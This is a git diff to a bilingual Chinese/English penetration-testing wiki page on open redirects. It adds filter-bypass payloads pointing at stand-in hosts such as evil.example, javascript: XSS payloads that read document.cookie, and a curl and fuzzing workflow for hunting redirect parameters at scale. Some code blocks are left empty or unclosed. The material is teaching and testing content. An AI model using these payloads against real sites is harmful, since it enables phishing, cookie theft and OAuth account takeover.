diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md
index d720a024d..95bc2239a 100644
--- a/src/pentesting-web/open-redirect.md
+++ b/src/pentesting-web/open-redirect.md
@@ -5,14 +5,25 @@
## Open redirect
-### 重定向到本地主机或任意域名
+### Redirect to localhost or arbitrary domains
+- 如果应用“allows only internal/whitelisted hosts”,尝试使用替代主机表示法,通过重定向目标命中回环或内部网段:
+- IPv4 回环变体: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
+- IPv6 回环变体: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
+- 末尾点与大小写变体: localhost., LOCALHOST, 127.0.0.1.
+- 解析到回环的通配符 DNS: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me。这些在只允许“subdomains of X”但主机解析仍指向 127.0.0.1 时很有用。
+- 网络路径引用通常能绕过那些在前面添加 a scheme 或只检查前缀的简单校验器:
+- //attacker.tld → 被解释为 scheme-relative,并随当前 scheme 导航到站外。
+- userinfo 技巧可以绕过针对受信任主机的 contains/startswith 检查:
+- https://trusted.tld@attacker.tld/ → 浏览器会导航到 attacker.tld,但简单的字符串检查会“看到” trusted.tld。
+- 反斜杠解析在不同框架/浏览器间的歧义:
+- https://trusted.tld\@attacker.tld → 一些后端将“\”视为路径字符从而通过校验;浏览器会将其归一化为“/”并把 trusted.tld 解释为 userinfo,从而将用户发送到 attacker.tld。This also appears in Node/PHP URL-parser mismatches.
{{#ref}}
ssrf-server-side-request-forgery/url-format-bypass.md
{{#endref}}
-### 开放重定向到XSS
+### Modern open-redirect to XSS pivots
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
@@ -58,7 +69,36 @@ javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
-## Open Redirect 上传 SVG 文件
+
+更现代的基于 URL 的 bypass payloads
+```text
+# Scheme-relative (current scheme is reused)
+//evil.example
+
+# Credentials (userinfo) trick
+https://trusted.example@evil.example/
+
+# Backslash confusion (server validates, browser normalizes)
+https://trusted.example\@evil.example/
+
+# Schemeless with whitespace/control chars
+evil.example%00
+%09//evil.example
+
+# Prefix/suffix matching flaws
+https://trusted.example.evil.example/
+https://evil.example/trusted.example
+
+# When only path is accepted, try breaking absolute URL detection
+/\\evil.example
+/..//evil.example
+```
+
+```
+
+
+## Open Redirect uploading svg files
+
```html
@@ -68,7 +108,9 @@ xmlns="http://www.w3.org/2000/svg">
```
-## 常见注入参数
+
+## Common injection parameters
+
```
/{payload}
?next={payload}
@@ -143,17 +185,23 @@ RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
-## 代码示例
+
+## Code examples
#### .Net
+
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
+
#### Java
+
```bash
response.redirect("http://mysafedomain.com");
```
+
#### PHP
+
```php
```
+
+## Hunting and exploitation workflow (practical)
+
+- Single URL check with curl:
+
+```bash
+curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
+```
+
+- Discover and fuzz likely parameters at scale:
+
+
+Click to expand
+
+```bash
+# 1) 收集历史 URLs,保留那些带有常见重定向参数
+cat domains.txt \
+| gau --o urls.txt # or: waybackurls / katana / hakrawler
+
+# 2) Grep 常见参数并规范化列表
+rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
+| sed 's/\r$//' | sort -u > candidates.txt
+
+# 3) 使用 OpenRedireX 对 payload 语料进行 fuzz
+cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt
+
+# 4) 手动验证有趣的命中
+awk '/30[1237]|Location:/I' results.txt
+```
+```
+
+
+- 别忘了 SPAs 中的 client-side sinks:查找 window.location/assign/replace 以及读取 query/hash 并执行重定向的 framework helpers。
+
+- Frameworks 往往在重定向目标由不受信任输入(query params、Referer、cookies)派生时引入 footguns。查看 Next.js 关于 redirects 的说明,避免从用户输入派生动态目标。
+
+{{#ref}}
+../network-services-pentesting/pentesting-web/nextjs.md
+{{#endref}}
+
+- OAuth/OIDC flows:滥用 open redirectors 经常会通过 leaking authorization codes/tokens 升级为 account takeover。查看专门指南:
+
+{{#ref}}
+./oauth-to-account-takeover.md
+{{#endref}}
+
+- 实现重定向但不使用 Location(meta refresh/JavaScript)的服务端响应仍可被用于 phishing,并且有时可以串联。Grep for:
+```html
+
+
+```
## 工具
- [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
+- OpenRedireX – 用于检测 open redirects 的 fuzzer。示例:
+```bash
+# Install
+git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh
-## 资源
+# Fuzz a list of candidate URLs (use FUZZ as placeholder)
+cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
+```
+## 参考资料
-- 在 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) 中可以找到模糊测试列表。
+- 在 https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect 你可以找到 fuzzing 列表。
- [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
- [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
- [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
-
+- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
+- OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX
{{#include ../banners/hacktricks-training.md}}